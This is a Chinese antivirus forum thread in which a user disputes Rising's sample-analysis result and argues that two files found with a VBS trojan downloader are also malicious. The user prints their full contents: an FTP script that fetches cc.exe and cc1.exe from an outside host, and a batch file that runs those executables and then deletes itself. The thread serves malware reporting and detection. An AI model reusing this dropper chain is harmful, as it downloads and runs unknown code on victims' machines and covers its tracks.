瑞星卡卡安全论坛

尊敬的客户，您好！

您的邮件已经收到，感谢您对瑞星的支持。


我们已经详细分析过您的问题和文件，以下是您上传的文件的分析结果：

1、文件名：bai.VBS

  病毒名：Trojan.DL.Script.VBS.Drun.a

2、文件名：help.dll
  不是病毒

3、文件名：bai.BAT
  不是病毒


您所上报的病毒文件将在瑞星2009的20.39.32版本(瑞星2008的20.39.32版本)中处理解决。


注意：如果您上报的文件损坏或者压缩包有密码保护，会导致我们无法正确分析，请您确认文件正常且压缩包中无密码后再提交。

如有问题，您可以通过邮件服务中心与我们联系，详细描述您的问题，并且提供此封邮件主题中的流水单号以及上报所用的电子邮件地址。


提 醒：为保证收到您的来信，请勿直接回复本邮件!!!

这是上报样本的报告，大家都知道，这个是非常有名的病毒的样本，很难清除，瑞星做不到，别 的杀软也做不到，可是瑞星的工程师连病毒都不认识吗？用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

对了，也许是因为机器分析样本的缘故，才使得分析的结果有时候会出错。
因此在这里想建议一下，如果机器分析样本的准确率比较低的话，能否尽量少用机器分析样本的方法来处理样本。

请提供该邮件的流水单号，上报时使用的邮箱地址，最好能将上报文件再次上传，我们会尽快核实该问题。

病毒上报邮件分析结果－流水单号 : 20090418230253671029   

上报邮箱：lostcity5253@163.com

样本我删了，我可怕谁用我电脑时给我点一下，虽然在我电脑上被别的软件拦下来了，可是万一……嘻嘻~~~我就惨了……等再抓到再上报，这个病毒应该还有不少别的文件的，能弄到的话一起来了

文件中的bai.bat    help.dll里面都是文本样的，，是命令，都晕死哦，你们的破机器能判断几条ftp命令是病毒吗？但大家知道，悄悄的进来的，悄悄的招待的，肯定是马了……

你们看下吧，不会把样本弄没了吧！！！

help.dll
的代码
OPEN crr.fdu8.cn
168
get crr.ini cc.exe
get crt.ini cc1.exe
bye



bai.bat的代码
del cc.exe
ftp.exe -s:C:\WINDOWS\help\help.dll
if not exist cc.exe sfd -s:C:\WINDOWS\help\help.dll
if not exist cc.exe sft -s:C:\WINDOWS\help\help.dll
cc.exe
cc.exe
cc1.exe
cc1.exe
if not exist cc.exe C:\WINDOWS\help\bai.VBS
:end
del C:\WINDOWS\help\help.dll
del C:\WINDOWS\help\bai.BAT
exit

由于不知道 cc.exe 和cc1.exe所以 以上文件不是病毒

想来您是瑞星的工程师了，我想提这样简单的问题：普通 的用户是否没事闲得整俩破文件去瑞星找乐吗？以上两个文件，所在的位置是c:\windows\help，是同那个bai.vbs共同出现的，虽然代码本身就是一些命令，但正常的人使用的，会不会悄悄的运行，并且还要删除自身呢？那个CC.exe或cc1.exe我弄不到，我觉得卡卡的工程师不会也弄不到吧，他从网上下载的地址都有了，想要分析的话也不是太难的事情。真的希望瑞星能快点处理这些东西，而不是简单的使用代码查杀，至少，也要提示这样的软件存在高风险，可是瑞星对之不理，让我们这些瑞星的用户怎么能用得放心 呢？？

该用户帖子内容已被屏蔽

楼主你有样本么？发上来一下

您好，我们重新分析了您邮件中上报的样本，其中文件bai.VBS确认为病毒，病毒名称：Trojan.DL.Script.VBS.Drun.a
其余文件不是病毒。